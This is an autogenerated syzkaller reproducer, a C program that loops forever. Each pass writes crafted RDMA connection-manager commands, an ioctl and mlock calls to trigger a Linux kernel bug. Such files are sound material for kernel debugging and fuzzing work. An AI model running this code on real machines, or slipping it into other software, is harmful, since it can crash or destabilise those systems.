// https://syzkaller.appspot.com/bug?id=d4ac7bfeafac8a3d6d06123e078462ac765415e7 // autogenerated by syzkaller (http://github.com/google/syzkaller) #define _GNU_SOURCE #include #include #include #include #include static void test(); void loop() { while (1) { test(); } } #ifndef __NR_mlock2 #define __NR_mlock2 325 #endif uint64_t r[4] = {0xffffffffffffffff, 0xffffffffffffffff, 0xffffffff, 0xffffffffffffffff}; void test() { long res; memcpy((void*)0x200002c0, "/selinux/mls", 13); res = syscall(__NR_openat, 0xffffffffffffff9c, 0x200002c0, 0, 0); if (res != -1) r[0] = res; *(uint32_t*)0x20000100 = 0x7b; *(uint32_t*)0x20000104 = 0; *(uint64_t*)0x20000108 = 1; *(uint64_t*)0x20000110 = 7; *(uint64_t*)0x20000118 = 0x81; *(uint64_t*)0x20000120 = 0; *(uint8_t*)0x20000128 = 0; *(uint8_t*)0x20000129 = 0; *(uint8_t*)0x2000012a = 0; *(uint8_t*)0x2000012b = 0; *(uint8_t*)0x2000012c = 0; *(uint8_t*)0x2000012d = 0; *(uint8_t*)0x2000012e = 0; *(uint8_t*)0x2000012f = 0; *(uint8_t*)0x20000130 = 0; *(uint8_t*)0x20000131 = 0; *(uint8_t*)0x20000132 = 0; *(uint8_t*)0x20000133 = 0; *(uint8_t*)0x20000134 = 0; *(uint8_t*)0x20000135 = 0; *(uint8_t*)0x20000136 = 0; *(uint8_t*)0x20000137 = 0; *(uint8_t*)0x20000138 = 0; *(uint8_t*)0x20000139 = 0; *(uint8_t*)0x2000013a = 0; *(uint8_t*)0x2000013b = 0; *(uint8_t*)0x2000013c = 0; *(uint8_t*)0x2000013d = 0; *(uint8_t*)0x2000013e = 0; *(uint8_t*)0x2000013f = 0; *(uint8_t*)0x20000140 = 0; *(uint8_t*)0x20000141 = 0; *(uint8_t*)0x20000142 = 0; *(uint8_t*)0x20000143 = 0; *(uint8_t*)0x20000144 = 0; *(uint8_t*)0x20000145 = 0; *(uint8_t*)0x20000146 = 0; *(uint8_t*)0x20000147 = 0; *(uint8_t*)0x20000148 = 0; *(uint8_t*)0x20000149 = 0; *(uint8_t*)0x2000014a = 0; *(uint8_t*)0x2000014b = 0; *(uint8_t*)0x2000014c = 0; *(uint8_t*)0x2000014d = 0; *(uint8_t*)0x2000014e = 0; *(uint8_t*)0x2000014f = 0; *(uint8_t*)0x20000150 = 0; *(uint8_t*)0x20000151 = 0; *(uint8_t*)0x20000152 = 0; *(uint8_t*)0x20000153 = 0; *(uint8_t*)0x20000154 = 0; *(uint8_t*)0x20000155 = 0; *(uint8_t*)0x20000156 = 0; *(uint8_t*)0x20000157 = 0; *(uint8_t*)0x20000158 = 0; *(uint8_t*)0x20000159 = 0; *(uint8_t*)0x2000015a = 0; *(uint8_t*)0x2000015b = 0; *(uint8_t*)0x2000015c = 0; *(uint8_t*)0x2000015d = 0; *(uint8_t*)0x2000015e = 0; *(uint8_t*)0x2000015f = 0; *(uint8_t*)0x20000160 = 0; *(uint8_t*)0x20000161 = 0; *(uint8_t*)0x20000162 = 0; *(uint8_t*)0x20000163 = 0; *(uint8_t*)0x20000164 = 0; *(uint8_t*)0x20000165 = 0; *(uint8_t*)0x20000166 = 0; *(uint8_t*)0x20000167 = 0; syscall(__NR_ioctl, r[0], 0x4068aea3, 0x20000100); memcpy((void*)0x20000180, "/dev/infiniband/rdma_cm", 24); res = syscall(__NR_openat, 0xffffffffffffff9c, 0x20000180, 2, 0); if (res != -1) r[1] = res; *(uint32_t*)0x20001bc0 = 0; *(uint16_t*)0x20001bc4 = 0x18; *(uint16_t*)0x20001bc6 = 0xfa00; *(uint64_t*)0x20001bc8 = 1; *(uint64_t*)0x20001bd0 = 0x20001b80; *(uint16_t*)0x20001bd8 = 1; *(uint8_t*)0x20001bda = 6; *(uint8_t*)0x20001bdb = 0; *(uint8_t*)0x20001bdc = 0; *(uint8_t*)0x20001bdd = 0; *(uint8_t*)0x20001bde = 0; *(uint8_t*)0x20001bdf = 0; res = syscall(__NR_write, r[1], 0x20001bc0, 0x20); if (res != -1) r[2] = *(uint32_t*)0x20001b80; syscall(__NR_mlock2, 0x20ffc000, 0x4000, 1); *(uint32_t*)0x20001c00 = 9; *(uint16_t*)0x20001c04 = 0x108; *(uint16_t*)0x20001c06 = 0xfa00; *(uint32_t*)0x20001c08 = r[2]; *(uint8_t*)0x20001c0c = 0x40; memcpy((void*)0x20001c0d, "\xfd\xb9\xd6", 3); memcpy((void*)0x20001c10, "\xd2\x82\x4d\x69\xfe\xb2\x0a\x47\xac\x07\x67\xc2\x09\x00\x3c\xee\x3f" "\x97\x3e\x9e\x7f\x8c\xd2\x25\x09\xc8\x45\xa8\xbd\x5b\x39\xee\x45\x90" "\x24\x26\xc0\x8a\xf0\x43\x6d\x0d\xd0\x5c\x5f\x3a\xd9\x30\x88\x5d\x30" "\xcc\x8d\x43\x43\xdc\x13\x1f\xb6\x2a\xb0\xb6\xb4\x17\xa3\x5f\x96\xb7" "\x4a\x55\x6f\xec\x6c\x58\x55\xfc\xa9\xf8\xb6\x6e\x08\x0b\x3b\x72\x2f" "\x32\x99\x2f\x1b\xfb\xa8\x9d\xb5\x8a\x11\x04\xc5\xbe\x10\x23\x0e\xdb" "\xb5\x42\x0c\xb8\xe5\x5f\x1b\x60\xcd\x8f\x2f\x54\x7c\xb7\x15\x1b\xd9" "\xa1\x70\x02\x21\x77\xaa\xea\x5b\xa4\xe6\xb6\x0f\x26\x84\x18\x34\x55" "\x98\x65\x49\x45\xab\x0b\xd5\xa2\x47\xb2\x08\xe0\xd0\x70\xa2\xb7\xee" "\xcb\xe2\xb7\xda\x2f\xa3\x22\x31\x80\xcf\x01\x96\x4c\xcb\xdc\xf3\x09" "\x57\x3f\xd3\x95\xa9\xf8\xb0\x0a\xd3\x70\x28\x40\x03\xdb\xa6\x86\x3b" "\x34\x06\xf3\x98\xe3\xd4\x5e\xf8\x45\x10\xb1\x59\xdc\xa0\x13\x56\x3d" "\x77\x71\xcd\x4e\x73\xc5\x95\x3e\x37\x2e\xbd\xcc\x3c\x39\xa6\x14\xa8" "\x85\x14\xa2\xce\xa0\x9f\xb0\xe5\x9f\x00\x48\xbb\xa9\x46\x39\x97\x45" "\x66\xad\x70\x81\xc7\xb5\x5b\x3d\xc7\x3f\xc4\x47\x9b\xd0\x1e\xe1\xae" "\xa9", 256); syscall(__NR_write, r[1], 0x20001c00, 0x110); syscall(__NR_mlock, 0x20fff000, 0x1000); *(uint32_t*)0x200000c0 = 0; *(uint16_t*)0x200000c4 = 0x18; *(uint16_t*)0x200000c6 = 0xfa00; *(uint64_t*)0x200000c8 = 3; *(uint64_t*)0x200000d0 = 0x20000080; *(uint16_t*)0x200000d8 = 2; *(uint8_t*)0x200000da = 0; *(uint8_t*)0x200000db = 0; *(uint8_t*)0x200000dc = 0; *(uint8_t*)0x200000dd = 0; *(uint8_t*)0x200000de = 0; *(uint8_t*)0x200000df = 0; res = syscall(__NR_write, r[1], 0x200000c0, 0x20); if (res != -1) r[3] = *(uint32_t*)0x20000080; memcpy((void*)0x200001c0, "\x03\x00\x00\x00\x40\x00\x00\xfa\x0a\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00" "\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\xff\x01\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00", 64); *(uint32_t*)0x20000200 = r[3]; memcpy((void*)0x20000204, "\xd1\x16\x00\x27", 4); syscall(__NR_write, r[1], 0x200001c0, 0x48); syscall(__NR_close, r[1]); } int main() { syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0); for (;;) { loop(); } }